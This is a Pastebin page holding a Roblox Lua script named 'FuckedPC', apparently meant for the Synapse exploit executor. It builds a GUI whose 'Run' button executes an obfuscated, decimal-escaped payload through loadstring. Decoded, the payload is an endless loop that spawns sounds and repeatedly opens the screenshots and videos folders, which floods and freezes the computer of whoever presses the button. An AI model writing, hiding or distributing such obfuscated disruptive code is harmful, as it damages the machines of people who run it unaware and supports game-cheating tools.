Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- print'FuckedPC Made By RyanDaCoder, BX1V, CopyString'
- print'This only works for Synapse, enjoy xddd'
- wait(1)
- -- Objects
- local ScreenGui = Instance.new("ScreenGui")
- local TextLabel = Instance.new("TextLabel")
- local Frame = Instance.new("Frame")
- local run = Instance.new("TextButton")
- -- Properties
- ScreenGui.Parent = game.CoreGui
- TextLabel.Parent = ScreenGui
- TextLabel.Active = true
- TextLabel.BackgroundColor3 = Color3.new(1, 1, 1)
- TextLabel.Draggable = true
- TextLabel.Position = UDim2.new(0, 0, 0.279951096, 0)
- TextLabel.Size = UDim2.new(0, 392, 0, 24)
- TextLabel.Font = Enum.Font.SourceSans
- TextLabel.Text = "FuckedPC"
- TextLabel.TextColor3 = Color3.new(0, 0, 0)
- TextLabel.TextSize = 14
- Frame.Parent = TextLabel
- Frame.BackgroundColor3 = Color3.new(1, 1, 1)
- Frame.Position = UDim2.new(0, 0, 1, 0)
- Frame.Size = UDim2.new(0, 392, 0, 271)
- run.Name = "run"
- run.Parent = Frame
- run.BackgroundColor3 = Color3.new(1, 1, 1)
- run.Position = UDim2.new(0.235449731, 0, 0.43726939, 0)
- run.Size = UDim2.new(0, 200, 0, 34)
- run.Font = Enum.Font.SourceSans
- run.Text = "Run"
- run.TextColor3 = Color3.new(0, 0, 0)
- run.TextScaled = true
- run.TextSize = 14
- run.TextWrapped = true
- run.MouseButton1Click:connect(function()
- loadstring('\119\104\105\108\101\32\116\114\117\101\32\100\111\10\32\32\32\32\32\32\32\32\32\32\32\32\115\112\97\119\110\40\102\117\110\99\116\105\111\110\40\41\10\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\101\103\103\32\61\32\73\110\115\116\97\110\99\101\46\110\101\119\40\34\83\111\117\110\100\34\44\32\119\111\114\107\115\112\97\99\101\41\10\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\101\103\103\46\83\111\117\110\100\73\100\32\61\32\34\114\98\120\97\115\115\101\116\105\100\58\47\47\51\52\53\50\56\55\56\52\53\34\10\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\101\103\103\58\80\108\97\121\40\41\10\32\32\32\32\32\32\32\32\32\32\32\32\101\110\100\41\10\32\32\32\32\32\32\32\32\32\32\32\32\115\112\97\119\110\40\102\117\110\99\116\105\111\110\40\41\10\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\103\97\109\101\58\79\112\101\110\83\99\114\101\101\110\115\104\111\116\115\70\111\108\100\101\114\40\41\10\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\32\103\97\109\101\58\79\112\101\110\86\105\100\101\111\115\70\111\108\100\101\114\40\41\10\32\32\32\32\32\32\32\32\32\32\32\32\101\110\100\41\10\32\32\32\32\32\32\32\32\32\32\32\32\119\97\105\116\40\41\10\32\32\32\32\32\32\32\32\101\110\100\10')()
- end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement